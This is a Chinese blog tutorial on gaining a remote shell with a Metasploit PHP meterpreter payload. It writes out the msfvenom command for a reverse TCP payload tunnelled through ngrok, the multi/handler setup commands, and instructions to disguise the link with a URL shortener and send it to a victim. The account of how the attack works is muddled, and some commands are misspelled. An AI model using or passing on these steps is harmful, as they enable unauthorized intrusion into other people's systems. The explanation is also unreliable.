您的位置:首页 > 编程语言 > PHP开发

使用PHP有效负载(msf)和ngrok进行黑客攻击 (ABPET)

2019-09-11 20:40 232 查看
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://blog.csdn.net/qq_43504064/article/details/100748500

使用PHP有效负载和ngrok 进行黑客攻击

我们将使用PHP有效负载进行黑客攻击,在本教程中我们将使用msfvenom(其实就是MSF)。

Msfvenom包含在kali linux操作系统中

工具准备阶段

  • 步骤1:安装ngrok

请按照说明书安装ngrok。

让我们从下载ngrok开始。在这里下载ngrok。https://ngrok.com/download.

一旦ngrok完成下载,解压缩Zip存档,然后将cd放入其中,例如“cd ngrok”。

cd ngrok

安装AuthToken(下面的auth代码是从ngrok.com帐户复制auth令牌的示例)。复制ngrok.com帐户中的身份验证代码,我们将使用该代码对隧道进行身份验证。您可以通过进入存储和使用ngrok的文件夹。“/ngrok authToken yourauthTokenhere”将保存身份验证代码。
例子

./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3

现在我们将创建一个安全的TCP隧道,打开一个新的TCP终端,键入ngrok TCP 4545,将端口号更改为您想使用的任何端口。

创建PHP有效负载

现在我们将使用msfvenom来创建PHP有效负载。

打开一个新的命令终端,在下面输入命令,将LPORT更改为启动ngrok时指定的端口。

msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=17928 R > home.php

启动多/处理程序

在新的命令终端中输入命令。

service postgrsql start
service apache2 start

将下面的命令输入终端

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 127.0.0.1
set port 17928

将php文件复制到/var/www/html

键入msf控制台终端中的漏洞。

缩短URL

访问tinyurl.com并缩短网址。
例如127.0.0.1:17928

向受害者发送缩短的微URL链接,因为我们是在本地环境中工作的,所以不用再输入网址,直接输入IP地址和后面的端口号访问就行
当你使用MSF发起攻击后,如果对方计算机访问了你的PHP网站,那么它将会被植入一个PHP级别的监听TCP程序并且激活,你就成功2获得了一个SHELL,接下来的工作不做介绍。

原理

通过使计算机访问指定微URL(IP)是对方计算机植入并且激活了网页自带的挂马,并且创建TCP反向会话连接,已达到反弹SHELL的目的来入侵目标计算机

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: